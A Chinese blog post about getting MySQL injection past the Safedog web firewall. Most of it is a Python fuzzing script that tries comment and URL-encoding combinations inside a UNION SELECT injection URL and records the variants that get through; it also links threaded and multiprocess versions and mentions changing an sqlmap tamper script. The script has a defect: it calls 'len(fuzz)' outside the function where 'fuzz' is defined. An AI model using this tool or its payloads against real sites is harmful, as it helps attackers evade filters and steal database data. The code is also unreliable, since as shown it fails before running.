MYSQL注入绕过安全狗及tamper脚本修改

发表于 | 分类于 | 浏览
字数统计: 447 字 | 阅读时长 ≈ 2 分钟

这个技巧是借鉴了Va1n3R在漏洞银行的视频,对其脚本进行了改进。

PHP+MySQL+Apache环境及测试源码

环境: PHPStudy集成的

源码: FUZZ源码

fuzz脚本

  • 1.做一个规则库,并生成一个存放n个fuzz字符的generator(如果不使用生成器,不能跑8位及以上的payload,8位payload一共3亿多个,全部写入内存会卡的跑不动,这是一点对Va1n3R牛脚本的修改)

  • 2.分析页面,正常时候返回页面有哪些标志,用来做成功的判断

  • 3.迭代generator,并构造payload访问URL

  • 4.如果成功则放入txt,否则只打印new url:url

  • 5.输出进度

代码实现:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#!/usr/bin/python
#coding:utf-8
import sys,requests

def _generator():
	fuzz_zs = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00']
	fuzz_sz = ['',' ']
	fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j"]
	fuzz = fuzz_zs+fuzz_sz+fuzz_ch
	for a in fuzz:
		for b in fuzz:
			for c in fuzz:
				for d in fuzz:
					for e in fuzz:
						for f in fuzz:
							st = a+b+c+d+e+f
							yield st

g = _generator()
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0"}
i = 0
glen = len(fuzz)**6
for st in g:
	i+=1
	url = "http://127.0.0.1/fuzz/index.php?id=1"
	url = url+" /*!union"+st+"select*/ 1,2,3"
	sys.stdout.write(' '*30 + '\r')
	#sys.stdout.flush()
	print("[-] new URL: %s"%url)
	sys.stdout.write("正在测试:%d/%d"%(i,glen))
	sys.stdout.flush()
	res = requests.get(url,headers=headers)
	if '<td>id</td>' in res.text:
		sys.stdout.write("[+] Find Bypass URL: %s\n"%url)
		with open('./apache.txt','a+') as f:
			f.write(url+'\n')

多线程成品版本:

mysql-injection-fuzz_thread

多进程成品版本:

mysql-injection-fuzz_process

成品展示:

tamper脚本修改

修改 versionedmorekeywords.py 用MySQL注释包围每个关键字脚本